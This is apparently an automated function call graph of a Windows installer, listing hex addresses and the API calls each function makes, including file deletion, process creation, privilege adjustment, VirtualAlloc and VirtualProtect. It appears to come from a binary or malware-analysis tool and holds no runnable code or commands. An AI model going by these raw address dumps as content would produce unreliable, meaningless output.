4347->4348 4349 402c51 4348->4349 4349->4344 4350 401957 4351 401959 4350->4351 4352 402c5e 21 API calls 4351->4352 4353 40195e 4352->4353 4356 405a4f 4353->4356 4396 405d0d 4356->4396 4359 405a77 DeleteFileA 4361 401967 4359->4361 4360 405a8e 4362 405bc6 4360->4362 4410 40628d lstrcpynA 4360->4410 4362->4361 4369 406620 2 API calls 4362->4369 4364 405ab4 4365 405ac7 4364->4365 4366 405aba lstrcatA 4364->4366 4411 405c66 lstrlenA 4365->4411 4367 405acd 4366->4367 4371 405adb lstrcatA 4367->4371 4373 405ae6 lstrlenA FindFirstFileA 4367->4373 4370 405be0 4369->4370 4370->4361 4372 405be4 4370->4372 4371->4373 4424 405c1f lstrlenA CharPrevA 4372->4424 4375 405bbc 4373->4375 4392 405b0a 4373->4392 4375->4362 4377 405c4a CharNextA 4377->4392 4378 405a07 5 API calls 4379 405bf6 4378->4379 4380 405c10 4379->4380 4381 405bfa 4379->4381 4384 4053d1 28 API calls 4380->4384 4381->4361 4386 4053d1 28 API calls 4381->4386 4382 405b9b FindNextFileA 4385 405bb3 FindClose 4382->4385 4382->4392 4384->4361 4385->4375 4387 405c07 4386->4387 4388 406066 40 API calls 4387->4388 4391 405c0e 4388->4391 4390 405a4f 64 API calls 4390->4392 4391->4361 4392->4377 4392->4382 4392->4390 4393 4053d1 28 API calls 4392->4393 4394 4053d1 28 API calls 4392->4394 4395 406066 40 API calls 4392->4395 4415 40628d lstrcpynA 4392->4415 4416 405a07 4392->4416 4393->4382 4394->4392 4395->4392 4427 40628d lstrcpynA 4396->4427 4398 405d1e 4428 405cb8 CharNextA CharNextA 4398->4428 4401 405a6f 4401->4359 4401->4360 4402 406587 5 API calls 4408 405d34 4402->4408 4403 405d5f lstrlenA 4404 405d6a 4403->4404 4403->4408 4406 405c1f 3 API calls 4404->4406 4405 406620 2 API calls 4405->4408 4407 405d6f GetFileAttributesA 4406->4407 4407->4401 4408->4401 4408->4403 4408->4405 4409 405c66 2 API calls 4408->4409 4409->4403 4410->4364 4412 405c73 4411->4412 4413 405c84 4412->4413 4414 405c78 CharPrevA 4412->4414 4413->4367 4414->4412 4414->4413 4415->4392 4434 405dfb GetFileAttributesA 4416->4434 4419 405a34 4419->4392 4420 405a22 RemoveDirectoryA 4422 405a30 4420->4422 4421 405a2a DeleteFileA 4421->4422 4422->4419 4423 405a40 SetFileAttributesA 4422->4423 4423->4419 4425 405bea 4424->4425 4426 405c39 lstrcatA 4424->4426 4425->4378 4426->4425 4427->4398 4429 405ce3 4428->4429 4430 405cd3 4428->4430 4432 405c4a CharNextA 4429->4432 4433 405d03 4429->4433 4430->4429 4431 405cde CharNextA 4430->4431 4431->4433 4432->4429 4433->4401 4433->4402 4435 405a13 4434->4435 4436 405e0d SetFileAttributesA 4434->4436 4435->4419 4435->4420 4435->4421 4436->4435 4437 402758 4438 40275f 4437->4438 4440 402a6c 4437->4440 4439 402c3c 21 API calls 4438->4439 4441 402766 4439->4441 4442 402775 SetFilePointer 4441->4442 4442->4440 4443 402785 4442->4443 4445 4061eb wsprintfA 4443->4445 4445->4440 4461 4033d8 SetErrorMode GetVersionExA 4462 40342a GetVersionExA 4461->4462 4464 403469 4461->4464 4463 403446 4462->4463 4462->4464 4463->4464 4465 4034ed 4464->4465 4466 4066b5 5 API calls 4464->4466 4467 406647 3 API calls 4465->4467 4466->4465 4468 403503 lstrlenA 4467->4468 4468->4465 4469 403513 4468->4469 4470 4066b5 5 API calls 4469->4470 4471 40351a 4470->4471 4472 4066b5 5 API calls 4471->4472 4473 403521 4472->4473 4474 4066b5 5 API calls 4473->4474 4475 40352d #17 OleInitialize SHGetFileInfoA 4474->4475 4550 40628d lstrcpynA 4475->4550 4478 40357b GetCommandLineA 4551 40628d lstrcpynA 4478->4551 4480 40358d 4481 405c4a CharNextA 4480->4481 4482 4035b4 CharNextA 4481->4482 4488 4035c3 4482->4488 4483 403689 4484 40369d GetTempPathA 4483->4484 4552 4033a7 4484->4552 4486 4036b5 4489 4036b9 GetWindowsDirectoryA lstrcatA 4486->4489 4490 40370f DeleteFileA 4486->4490 4487 405c4a CharNextA 4487->4488 4488->4483 4488->4487 4494 40368b 4488->4494 4492 4033a7 12 API calls 4489->4492 4562 402f31 GetTickCount GetModuleFileNameA 4490->4562 4493 4036d5 4492->4493 4493->4490 4496 4036d9 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4493->4496 4646 40628d lstrcpynA 4494->4646 4495 403722 4502 405c4a CharNextA 4495->4502 4532 4037a7 4495->4532 4541 4037b7 4495->4541 4498 4033a7 12 API calls 4496->4498 4500 403707 4498->4500 4500->4490 4500->4541 4504 40373c 4502->4504 4513 403781 4504->4513 4514 4037e6 4504->4514 4505 4037d1 4656 4059a3 4505->4656 4506 403928 4507 403930 GetCurrentProcess OpenProcessToken 4506->4507 4508 4039a6 ExitProcess 4506->4508 4511 403976 4507->4511 4512 403947 LookupPrivilegeValueA AdjustTokenPrivileges 4507->4512 4518 4066b5 5 API calls 4511->4518 4512->4511 4516 405d0d 18 API calls 4513->4516 4660 40590e 4514->4660 4519 40378d 4516->4519 4523 40397d 4518->4523 4519->4541 4647 40628d lstrcpynA 4519->4647 4522 403992 ExitWindowsEx 4522->4508 4525 40399f 4522->4525 4523->4522 4523->4525 4674 40140b 4525->4674 4526 403803 4529 40381b 4526->4529 4664 40628d lstrcpynA 4526->4664 4527 40379c 4648 40628d lstrcpynA 4527->4648 4533 403839 wsprintfA 4529->4533 4547 403867 4529->4547 4590 403a96 4532->4590 4534 406320 21 API calls 4533->4534 4534->4529 4537 403877 GetFileAttributesA 4539 403883 DeleteFileA 4537->4539 4537->4547 4538 4038af SetCurrentDirectoryA 4540 406066 40 API calls 4538->4540 4539->4547 4542 4038be CopyFileA 4540->4542 4649 4039bc 4541->4649 4542->4541 4542->4547 4543 405a4f 71 API calls 4543->4547 4544 406066 40 API calls 4544->4547 4545 406320 21 API calls 4545->4547 4547->4529 4547->4533 4547->4537 4547->4538 4547->4541 4547->4543 4547->4544 4547->4545 4548 403918 CloseHandle 4547->4548 4549 406620 2 API calls 4547->4549 4665 405897 CreateDirectoryA 4547->4665 4668 4058f1 CreateDirectoryA 4547->4668 4671 405926 CreateProcessA 4547->4671 4548->4541 4549->4547 4550->4478 4551->4480 4553 406587 5 API calls 4552->4553 4555 4033b3 4553->4555 4554 4033bd 4554->4486 4555->4554 4556 405c1f 3 API calls 4555->4556 4557 4033c5 4556->4557 4558 4058f1 2 API calls 4557->4558 4559 4033cb 4558->4559 4677 405e4f 4559->4677 4681 405e20 GetFileAttributesA CreateFileA 4562->4681 4564 402f71 4584 402f81 4564->4584 4682 40628d lstrcpynA 4564->4682 4566 402f97 4567 405c66 2 API calls 4566->4567 4568 402f9d 4567->4568 4683 40628d lstrcpynA 4568->4683 4570 402fa8 GetFileSize 4571 4030a2 4570->4571 4589 402fbf 4570->4589 4684 402ecd 4571->4684 4573 4030ab 4575 4030db GlobalAlloc 4573->4575 4573->4584 4719 403390 SetFilePointer 4573->4719 4695 403390 SetFilePointer 4575->4695 4577 40310e 4581 402ecd 6 API calls 4577->4581 4579 4030c4 4582 40337a ReadFile 4579->4582 4580 4030f6 4696 403168 4580->4696 4581->4584 4585 4030cf 4582->4585 4584->4495 4585->4575 4585->4584 4586 402ecd 6 API calls 4586->4589 4587 403102 4587->4584 4587->4587 4588 40313f SetFilePointer 4587->4588 4588->4584 4589->4571 4589->4577 4589->4584 4589->4586 4716 40337a 4589->4716 4591 4066b5 5 API calls 4590->4591 4592 403aaa 4591->4592 4593 403ac2 4592->4593 4595 403ab0 4592->4595 4594 406174 3 API calls 4593->4594 4596 403aed 4594->4596 4733 4061eb wsprintfA 4595->4733 4598 403b0b lstrcatA 4596->4598 4600 406174 3 API calls 4596->4600 4599 403ac0 4598->4599 4725 403d5b 4599->4725 4600->4598 4603 405d0d 18 API calls 4604 403b3d 4603->4604 4605 403bc6 4604->4605 4607 406174 3 API calls 4604->4607 4606 405d0d 18 API calls 4605->4606 4608 403bcc 4606->4608 4609 403b69 4607->4609 4610 403bdc LoadImageA 4608->4610 4611 406320 21 API calls 4608->4611 4609->4605 4614 403b85 lstrlenA 4609->4614 4618 405c4a CharNextA 4609->4618 4612 403c82 4610->4612 4613 403c03 RegisterClassA 4610->4613 4611->4610 4617 40140b 2 API calls 4612->4617 4615 403c8c 4613->4615 4616 403c39 SystemParametersInfoA CreateWindowExA 4613->4616 4619 403b93 lstrcmpiA 4614->4619 4620 403bb9 4614->4620 4615->4541 4616->4612 4621 403c88 4617->4621 4623 403b83 4618->4623 4619->4620 4624 403ba3 GetFileAttributesA 4619->4624 4622 405c1f 3 API calls 4620->4622 4621->4615 4625 403d5b 22 API calls 4621->4625 4626 403bbf 4622->4626 4623->4614 4627 403baf 4624->4627 4628 403c99 4625->4628 4734 40628d lstrcpynA 4626->4734 4627->4620 4630 405c66 2 API calls 4627->4630 4631 403ca5 ShowWindow 4628->4631 4632 403d28 4628->4632 4630->4620 4633 406647 3 API calls 4631->4633 4634 4054a3 5 API calls 4632->4634 4636 403cbd 4633->4636 4635 403d2e 4634->4635 4637 403d32 4635->4637 4638 403d4a 4635->4638 4639 403ccb GetClassInfoA 4636->4639 4641 406647 3 API calls 4636->4641 4637->4615 4644 40140b 2 API calls 4637->4644 4640 40140b 2 API calls 4638->4640 4642 403cf5 DialogBoxParamA 4639->4642 4643 403cdf GetClassInfoA RegisterClassA 4639->4643 4640->4615 4641->4639 4645 40140b 2 API calls 4642->4645 4643->4642 4644->4615 4645->4615 4646->4484 4647->4527 4648->4532 4650 4039d4 4649->4650 4651 4039c6 CloseHandle 4649->4651 4739 403a01 4650->4739 4651->4650 4654 405a4f 71 API calls 4655 4037bf OleUninitialize 4654->4655 4655->4505 4655->4506 4657 4059b8 4656->4657 4658 4037de ExitProcess 4657->4658 4659 4059cc MessageBoxIndirectA 4657->4659 4659->4658 4661 4066b5 5 API calls 4660->4661 4662 4037eb lstrlenA 4661->4662 4663 40628d lstrcpynA 4662->4663 4663->4526 4664->4529 4666 4058e3 4665->4666 4667 4058e7 GetLastError 4665->4667 4666->4547 4667->4666 4669 405901 4668->4669 4670 405905 GetLastError 4668->4670 4669->4547 4670->4669 4672 405965 4671->4672 4673 405959 CloseHandle 4671->4673 4672->4547 4673->4672 4675 401389 2 API calls 4674->4675 4676 401420 4675->4676 4676->4508 4678 405e5a GetTickCount GetTempFileNameA 4677->4678 4679 4033d6 4678->4679 4680 405e87 4678->4680 4679->4486 4680->4678 4680->4679 4681->4564 4682->4566 4683->4570 4685 402ed6 4684->4685 4686 402eee 4684->4686 4687 402ee6 4685->4687 4688 402edf DestroyWindow 4685->4688 4689 402ef6 4686->4689 4690 402efe GetTickCount 4686->4690 4687->4573 4688->4687 4720 4066f1 4689->4720 4692 402f0c CreateDialogParamA ShowWindow 4690->4692 4693 402f2f 4690->4693 4692->4693 4693->4573 4695->4580 4697 40317e 4696->4697 4698 4031ac 4697->4698 4724 403390 SetFilePointer 4697->4724 4699 40337a ReadFile 4698->4699 4701 4031b7 4699->4701 4702 403313 4701->4702 4703 4031c9 GetTickCount 4701->4703 4705 4032fd 4701->4705 4704 403355 4702->4704 4709 403317 4702->4709 4703->4705 4712 403218 4703->4712 4706 40337a ReadFile 4704->4706 4705->4587 4706->4705 4707 40337a ReadFile 4707->4712 4708 40337a ReadFile 4708->4709 4709->4705 4709->4708 4710 405ec7 WriteFile 4709->4710 4710->4709 4711 40326e GetTickCount 4711->4712 4712->4705 4712->4707 4712->4711 4713 403293 MulDiv wsprintfA 4712->4713 4715 405ec7 WriteFile 4712->4715 4714 4053d1 28 API calls 4713->4714 4714->4712 4715->4712 4717 405e98 ReadFile 4716->4717 4718 40338d 4717->4718 4718->4589 4719->4579 4721 40670e PeekMessageA 4720->4721 4722 406704 DispatchMessageA 4721->4722 4723 402efc 4721->4723 4722->4721 4723->4573 4724->4698 4726 403d6f 4725->4726 4735 4061eb wsprintfA 4726->4735 4728 403de0 4736 403e14 4728->4736 4730 403b1b 4730->4603 4731 403de5 4731->4730 4732 406320 21 API calls 4731->4732 4732->4731 4733->4599 4734->4605 4735->4728 4737 406320 21 API calls 4736->4737 4738 403e22 SetWindowTextA 4737->4738 4738->4731 4740 403a0f 4739->4740 4741 403a14 FreeLibrary GlobalFree 4740->4741 4742 4039d9 4740->4742 4741->4741 4741->4742 4742->4654 5084 405358 5085 404379 SendMessageA 5084->5085 5086 405365 5085->5086 5087 401e5a GetDC 5088 402c3c 21 API calls 5087->5088 5089 401e6c GetDeviceCaps MulDiv ReleaseDC 5088->5089 5090 402c3c 21 API calls 5089->5090 5091 401e9d 5090->5091 5092 406320 21 API calls 5091->5092 5093 401eda CreateFontIndirectA 5092->5093 5094 40264d 5093->5094 4753 4015e0 4754 402c5e 21 API calls 4753->4754 4755 4015e7 4754->4755 4756 405cb8 4 API calls 4755->4756 4761 4015ef 4756->4761 4757 401649 4759 401677 4757->4759 4760 40164e 4757->4760 4758 405c4a CharNextA 4758->4761 4764 401423 28 API calls 4759->4764 4762 401423 28 API calls 4760->4762 4761->4757 4761->4758 4766 4058f1 2 API calls 4761->4766 4767 40590e 5 API calls 4761->4767 4770 401631 GetFileAttributesA 4761->4770 4771 405897 2 API calls 4761->4771 4763 401655 4762->4763 4772 40628d lstrcpynA 4763->4772 4769 40166f 4764->4769 4766->4761 4767->4761 4768 401660 SetCurrentDirectoryA 4768->4769 4770->4761 4771->4761 4772->4768 5095 4016e0 5096 402c5e 21 API calls 5095->5096 5097 4016e6 GetFullPathNameA 5096->5097 5098 4016fd 5097->5098 5104 40171e 5097->5104 5101 406620 2 API calls 5098->5101 5098->5104 5099 401732 GetShortPathNameA 5100 402aea 5099->5100 5102 40170e 5101->5102 5102->5104 5105 40628d lstrcpynA 5102->5105 5104->5099 5104->5100 5105->5104 5106 404463 lstrcpynA lstrlenA 5107 6c6018c7 5108 6c6018ea 5107->5108 5109 6c60191a GlobalFree 5108->5109 5110 6c60192c 5108->5110 5109->5110 5111 6c6012f6 2 API calls 5110->5111 5112 6c601aae GlobalFree GlobalFree 5111->5112 5113 6c6016c8 5114 6c6016f7 5113->5114 5115 6c601b28 18 API calls 5114->5115 5116 6c6016fe 5115->5116 5117 6c601711 5116->5117 5118 6c601705 5116->5118 5120 6c601738 5117->5120 5121 6c60171b 5117->5121 5119 6c6012f6 2 API calls 5118->5119 5124 6c60170f 5119->5124 5122 6c601762 5120->5122 5123 6c60173e 5120->5123 5125 6c601572 3 API calls 5121->5125 5127 6c601572 3 API calls 5122->5127 5126 6c6015e9 3 API calls 5123->5126 5128 6c601720 5125->5128 5129 6c601743 5126->5129 5127->5124 5130 6c6015e9 3 API calls 5128->5130 5131 6c6012f6 2 API calls 5129->5131 5132 6c601726 5130->5132 5133 6c601749 GlobalFree 5131->5133 5134 6c6012f6 2 API calls 5132->5134 5133->5124 5135 6c60175d GlobalFree 5133->5135 5136 6c60172c GlobalFree 5134->5136 5135->5124 5136->5124 4819 405969 ShellExecuteExA 4820 401eea 4821 402c3c 21 API calls 4820->4821 4822 401ef0 4821->4822 4823 402c3c 21 API calls 4822->4823 4824 401efc 4823->4824 4825 401f13 EnableWindow 4824->4825 4826 401f08 ShowWindow 4824->4826 4827 402aea 4825->4827 4826->4827 4828 40176b 4829 402c5e 21 API calls 4828->4829 4830 401772 4829->4830 4831 405e4f 2 API calls 4830->4831 4832 401779 4831->4832 4833 405e4f 2 API calls 4832->4833 4833->4832 5137 40196c 5138 402c5e 21 API calls 5137->5138 5139 401973 lstrlenA 5138->5139 5140 40264d 5139->5140 5141 401ff0 5142 402c5e 21 API calls 5141->5142 5143 401ff7 5142->5143 5144 406620 2 API calls 5143->5144 5145 401ffd 5144->5145 5147 40200f 5145->5147 5148 4061eb wsprintfA 5145->5148 5148->5147 5149 4014f4 SetForegroundWindow 5150 402aea 5149->5150 5151 6c6026d6 5152 6c6026e4 VirtualAlloc 5151->5152 5153 6c60273a 5151->5153 5152->5153 5154 6c601058 5155 6c601074 5154->5155 5156 6c6010dc 5155->5156 5157 6c60154b GlobalFree 5155->5157 5158 6c601091 5155->5158 5157->5158 5159 6c60154b GlobalFree 5158->5159 5160 6c6010a1 5159->5160 5161 6c6010b1 5160->5161 5162 6c6010a8 GlobalSize 5160->5162 5163 6c6010b5 GlobalAlloc 5161->5163 5164 6c6010c6 5161->5164 5162->5161 5165 6c601572 3 API calls 5163->5165 5166 6c6010d1 GlobalFree 5164->5166 5165->5164 5166->5156 5167 404778 5168 404788 5167->5168 5169 4047ae 5167->5169 5171 40432d 22 API calls 5168->5171 5170 404394 8 API calls 5169->5170 5173 4047ba 5170->5173 5172 404795 SetDlgItemTextA 5171->5172 5172->5169 5174 4027f9 5179 4061eb wsprintfA 5174->5179 5176 402800 5180 40628d lstrcpynA 5176->5180 5178 40295b 5179->5176 5180->5178 4945 40177e 4946 402c5e 21 API calls 4945->4946 4947 401785 4946->4947 4948 4017a3 4947->4948 4949 4017ab 4947->4949 4985 40628d lstrcpynA 4948->4985 4986 40628d lstrcpynA 4949->4986 4952 4017a9 4956 406587 5 API calls 4952->4956 4953 4017b6 4954 405c1f 3 API calls 4953->4954 4955 4017bc lstrcatA 4954->4955 4955->4952 4976 4017c8 4956->4976 4957 406620 2 API calls 4957->4976 4958 401809 4959 405dfb 2 API calls 4958->4959 4959->4976 4961 4017df CompareFileTime 4961->4976 4962 4018a3 4963 4053d1 28 API calls 4962->4963 4964 4018ad 4963->4964 4967 403168 35 API calls 4964->4967 4965 4053d1 28 API calls 4973 40188f 4965->4973 4966 40628d lstrcpynA 4966->4976 4968 4018c0 4967->4968 4969 4018d4 SetFileTime 4968->4969 4971 4018e6 FindCloseChangeNotification 4968->4971 4969->4971 4970 406320 21 API calls 4970->4976 4972 4018f7 4971->4972 4971->4973 4974 4018fc 4972->4974 4975 40190f 4972->4975 4977 406320 21 API calls 4974->4977 4978 406320 21 API calls 4975->4978 4976->4957 4976->4958 4976->4961 4976->4962 4976->4966 4976->4970 4979 4059a3 MessageBoxIndirectA 4976->4979 4982 40187a 4976->4982 4984 405e20 GetFileAttributesA CreateFileA 4976->4984 4980 401904 lstrcatA 4977->4980 4981 401917 4978->4981 4979->4976 4980->4981 4981->4973 4983 4059a3 MessageBoxIndirectA 4981->4983 4982->4965 4982->4973 4983->4973 4984->4976 4985->4952 4986->4953 5181 40167e 5182 402c5e 21 API calls 5181->5182 5183 401684 5182->5183 5184 406620 2 API calls 5183->5184 5185 40168a 5184->5185 5186 40197e 5187 402c3c 21 API calls 5186->5187 5188 401985 5187->5188 5189 402c3c 21 API calls 5188->5189 5190 401992 5189->5190 5191 402c5e 21 API calls 5190->5191 5192 4019a9 lstrlenA 5191->5192 5194 4019b9 5192->5194 5193 4019f9 5194->5193 5198 40628d lstrcpynA 5194->5198 5196 4019e9 5196->5193 5197 4019ee lstrlenA 5196->5197 5197->5193 5198->5196 5199 401000 5200 401037 BeginPaint GetClientRect 5199->5200 5201 40100c DefWindowProcA 5199->5201 5203 4010f3 5200->5203 5204 401179 5201->5204 5205 401073 CreateBrushIndirect FillRect DeleteObject 5203->5205 5206 4010fc 5203->5206 5205->5203 5207 401102 CreateFontIndirectA 5206->5207 5208 401167 EndPaint 5206->5208 5207->5208 5209 401112 6 API calls 5207->5209 5208->5204 5209->5208 5210 401502 5211 401507 5210->5211 5213 40152d 5210->5213 5212 402c3c 21 API calls 5211->5212 5212->5213 5214 401a83 5215 402c3c 21 API calls 5214->5215 5216 401a8c 5215->5216 5217 402c3c 21 API calls 5216->5217 5218 401a33 5217->5218 5219 401588 5220 402a67 5219->5220 5223 4061eb wsprintfA 5220->5223 5222 402a6c 5223->5222 5224 401b88 5225 402c5e 21 API calls 5224->5225 5226 401b8f 5225->5226 5227 402c3c 21 API calls 5226->5227 5228 401b98 wsprintfA 5227->5228 5229 402aea 5228->5229 5230 401d8a 5231 401d90 5230->5231 5232 401d9d GetDlgItem 5230->5232 5233 402c3c 21 API calls 5231->5233 5234 401d97 5232->5234 5233->5234 5235 401dde GetClientRect LoadImageA SendMessageA 5234->5235 5236 402c5e 21 API calls 5234->5236 5238 401e3f 5235->5238 5240 401e4b 5235->5240 5236->5235 5239 401e44 DeleteObject 5238->5239 5238->5240 5239->5240 5241 40278b 5242 402791 5241->5242 5243 402799 FindClose 5242->5243 5244 402aea 5242->5244 5243->5244 4159 40240d 4160 402c5e 21 API calls 4159->4160 4161 40241e 4160->4161 4162 402c5e 21 API calls 4161->4162 4163 402427 4162->4163 4164 402c5e 21 API calls 4163->4164 4165 402431 GetPrivateProfileStringA 4164->4165 5245 40280d 5246 402c5e 21 API calls 5245->5246 5247 402819 5246->5247 5248 40282f 5247->5248 5249 402c5e 21 API calls 5247->5249 5250 405dfb 2 API calls 5248->5250 5249->5248 5251 402835 5250->5251 5273 405e20 GetFileAttributesA CreateFileA 5251->5273 5253 402842 5254 4028fe 5253->5254 5257 4028e6 5253->5257 5258 40285d GlobalAlloc 5253->5258 5255 402905 DeleteFileA 5254->5255 5256 402918 5254->5256 5255->5256 5260 403168 35 API calls 5257->5260 5258->5257 5259 402876 5258->5259 5274 403390 SetFilePointer 5259->5274 5261 4028f3 CloseHandle 5260->5261 5261->5254 5263 40287c 5264 40337a ReadFile 5263->5264 5265 402885 GlobalAlloc 5264->5265 5266 402895 5265->5266 5267 4028cf 5265->5267 5268 403168 35 API calls 5266->5268 5269 405ec7 WriteFile 5267->5269 5272 4028a2 5268->5272 5270 4028db GlobalFree 5269->5270 5270->5257 5271 4028c6 GlobalFree 5271->5267 5272->5271 5273->5253 5274->5263 4197 40550f 4198 405531 GetDlgItem GetDlgItem GetDlgItem 4197->4198 4199 4056ba 4197->4199 4243 404362 SendMessageA 4198->4243 4201 4056c2 GetDlgItem CreateThread FindCloseChangeNotification 4199->4201 4202 4056ea 4199->4202 4201->4202 4266 4054a3 OleInitialize 4201->4266 4204 405718 4202->4204 4205 405700 ShowWindow ShowWindow 4202->4205 4206 405739 4202->4206 4203 4055a1 4210 4055a8 GetClientRect GetSystemMetrics SendMessageA SendMessageA 4203->4210 4207 405720 4204->4207 4208 405773 4204->4208 4248 404362 SendMessageA 4205->4248 4252 404394 4206->4252 4212 405728 4207->4212 4213 40574c ShowWindow 4207->4213 4208->4206 4219 405780 SendMessageA 4208->4219 4217 405616 4210->4217 4218 4055fa SendMessageA SendMessageA 4210->4218 4249 404306 4212->4249 4215 40576c 4213->4215 4216 40575e 4213->4216 4214 405745 4222 404306 SendMessageA 4215->4222 4221 4053d1 28 API calls 4216->4221 4223 405629 4217->4223 4224 40561b SendMessageA 4217->4224 4218->4217 4219->4214 4225 405799 CreatePopupMenu 4219->4225 4221->4215 4222->4208 4244 40432d 4223->4244 4224->4223 4226 406320 21 API calls 4225->4226 4228 4057a9 AppendMenuA 4226->4228 4230 4057c7 GetWindowRect 4228->4230 4231 4057da TrackPopupMenu 4228->4231 4229 405639 4232 405642 ShowWindow 4229->4232 4233 405676 GetDlgItem SendMessageA 4229->4233 4230->4231 4231->4214 4235 4057f6 4231->4235 4236 405665 4232->4236 4237 405658 ShowWindow 4232->4237 4233->4214 4234 40569d SendMessageA SendMessageA 4233->4234 4234->4214 4238 405815 SendMessageA 4235->4238 4247 404362 SendMessageA 4236->4247 4237->4236 4238->4238 4239 405832 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4238->4239 4241 405854 SendMessageA 4239->4241 4241->4241 4242 405876 GlobalUnlock SetClipboardData CloseClipboard 4241->4242 4242->4214 4243->4203 4245 406320 21 API calls 4244->4245 4246 404338 SetDlgItemTextA 4245->4246 4246->4229 4247->4233 4248->4204 4250 404313 SendMessageA 4249->4250 4251 40430d 4249->4251 4250->4206 4251->4250 4253 4043ac GetWindowLongA 4252->4253 4254 404457 4252->4254 4253->4254 4255 4043c1 4253->4255 4254->4214 4255->4254 4256 4043f1 4255->4256 4257 4043ee GetSysColor 4255->4257 4258 404401 SetBkMode 4256->4258 4259 4043f7 SetTextColor 4256->4259 4257->4256 4260 404419 GetSysColor 4258->4260 4261 40441f 4258->4261 4259->4258 4260->4261 4262 404430 4261->4262 4263 404426 SetBkColor 4261->4263 4262->4254 4264 404443 DeleteObject 4262->4264 4265 40444a CreateBrushIndirect 4262->4265 4263->4262 4264->4265 4265->4254 4273 404379 4266->4273 4268 4054c6 4272 4054ed 4268->4272 4276 401389 4268->4276 4269 404379 SendMessageA 4270 4054ff OleUninitialize 4269->4270 4272->4269 4274 404391 4273->4274 4275 404382 SendMessageA 4273->4275 4274->4268 4275->4274 4278 401390 4276->4278 4277 4013fe 4277->4268 4278->4277 4279 4013cb MulDiv SendMessageA 4278->4279 4279->4278 4280 40168f 4281 402c5e 21 API calls 4280->4281 4282 401696 4281->4282 4283 402c5e 21 API calls 4282->4283 4284 40169f 4283->4284 4285 402c5e 21 API calls 4284->4285 4286 4016a8 MoveFileA 4285->4286 4287 4016bb 4286->4287 4293 4016b4 4286->4293 4291 40230f 4287->4291 4294 406620 FindFirstFileA 4287->4294 4289 401423 28 API calls 4289->4291 4293->4289 4295 4016ca 4294->4295 4296 406636 FindClose 4294->4296 4295->4291 4297 406066 MoveFileExA 4295->4297 4296->4295 4298 406087 4297->4298 4299 40607a 4297->4299 4298->4293 4301 405ef6 4299->4301 4302 405f42 GetShortPathNameA 4301->4302 4303 405f1c 4301->4303 4305 406061 4302->4305 4306 405f57 4302->4306 4328 405e20 GetFileAttributesA CreateFileA 4303->4328 4305->4298 4306->4305 4308 405f5f wsprintfA 4306->4308 4307 405f26 CloseHandle GetShortPathNameA 4307->4305 4309 405f3a 4307->4309 4310 406320 21 API calls 4308->4310 4309->4302 4309->4305 4311 405f87 4310->4311 4329 405e20 GetFileAttributesA CreateFileA 4311->4329 4313 405f94 4313->4305 4314 405fa3 GetFileSize GlobalAlloc 4313->4314 4315 405fc5 4314->4315 4316 40605a CloseHandle 4314->4316 4330 405e98 ReadFile 4315->4330 4316->4305 4321 405fe4 lstrcpyA 4324 406006 4321->4324 4322 405ff8 4323 405d85 4 API calls 4322->4323 4323->4324 4325 40603d SetFilePointer 4324->4325 4337 405ec7 WriteFile 4325->4337 4328->4307 4329->4313 4331 405eb6 4330->4331 4331->4316 4332 405d85 lstrlenA 4331->4332 4333 405dc6 lstrlenA 4332->4333 4334 405dce 4333->4334 4335 405d9f lstrcmpiA 4333->4335 4334->4321 4334->4322 4335->4334 4336 405dbd CharNextA 4335->4336 4336->4333 4338 405ee5 GlobalFree 4337->4338 4338->4316 5275 404b10 5276 404b20 5275->5276 5277 404b3c 5275->5277 5286 405987 GetDlgItemTextA 5276->5286 5279 404b42 SHGetPathFromIDListA 5277->5279 5280 404b6f 5277->5280 5282 404b59 SendMessageA 5279->5282 5283 404b52 5279->5283 5281 404b2d SendMessageA 5281->5277 5282->5280 5285 40140b 2 API calls 5283->5285 5285->5282 5286->5281 5287 401490 5288 4053d1 28 API calls 5287->5288 5289 401497 5288->5289 4339 6c6029b1 4340 6c602a01 4339->4340 4341 6c6029c1 VirtualProtect 4339->4341 4341->4340 5290 401a12 5291 402c5e 21 API calls 5290->5291 5292 401a19 5291->5292 5293 402c5e 21 API calls 5292->5293 5294 401a22 5293->5294 5295 401a29 lstrcmpiA 5294->5295 5296 401a3b lstrcmpA 5294->5296 5297 401a2f 5295->5297 5296->5297 5298 401594 5299 4015a4 ShowWindow 5298->5299 5300 4015ab 5298->5300 5299->5300 5301 4015b9 ShowWindow 5300->5301 5302 402aea 5300->5302 5301->5302 4446 402318 4447 402c5e 21 API calls 4446->4447 4448 40231e 4447->4448 4449 402c5e 21 API calls 4448->4449 4450 402327 4449->4450 4451 402c5e 21 API calls 4450->4451 4452 402330 4451->4452 4453 406620 2 API calls 4452->4453 4454 402339 4453->4454 4455 40234a lstrlenA lstrlenA 4454->4455 4456 40233d 4454->4456 4458 4053d1 28 API calls 4455->4458 4457 4053d1 28 API calls 4456->4457 4460 402345 4456->4460 4457->4460 4459 402386 SHFileOperationA 4458->4459 4459->4456 4459->4460 5303 404498 5304 4044ae 5303->5304 5309 4045ba 5303->5309 5307 40432d 22 API calls 5304->5307 5305 404629 5306 4046f3 5305->5306 5308 404633 GetDlgItem 5305->5308 5315 404394 8 API calls 5306->5315 5310 404504 5307->5310 5311 404649 5308->5311 5312 4046b1 5308->5312 5309->5305 5309->5306 5313 4045fe GetDlgItem SendMessageA 5309->5313 5314 40432d 22 API calls 5310->5314 5311->5312 5320 40466f SendMessageA LoadCursorA SetCursor 5311->5320 5312->5306 5316 4046c3 5312->5316 5336 40434f KiUserCallbackDispatcher 5313->5336 5318 404511 CheckDlgButton 5314->5318 5319 4046ee 5315->5319 5321 4046c9 SendMessageA 5316->5321 5322 4046da 5316->5322 5334 40434f KiUserCallbackDispatcher 5318->5334 5340 40473c 5320->5340 5321->5322 5322->5319 5326 4046e0 SendMessageA 5322->5326 5323 404624 5337 404718 5323->5337 5326->5319 5328 40452f GetDlgItem 5335 404362 SendMessageA 5328->5335 5331 404545 SendMessageA 5332 404563 GetSysColor 5331->5332 5333 40456c SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5331->5333 5332->5333 5333->5319 5334->5328 5335->5331 5336->5323 5338 404726 5337->5338 5339 40472b SendMessageA 5337->5339 5338->5339 5339->5305 5343 405969 ShellExecuteExA 5340->5343 5342 4046a2 LoadCursorA SetCursor 5342->5312 5343->5342 5344 402198 5345 402c5e 21 API calls 5344->5345 5346 40219f 5345->5346 5347 402c5e 21 API calls 5346->5347 5348 4021a9 5347->5348 5349 402c5e 21 API calls 5348->5349 5350 4021b3 5349->5350 5351 402c5e 21 API calls 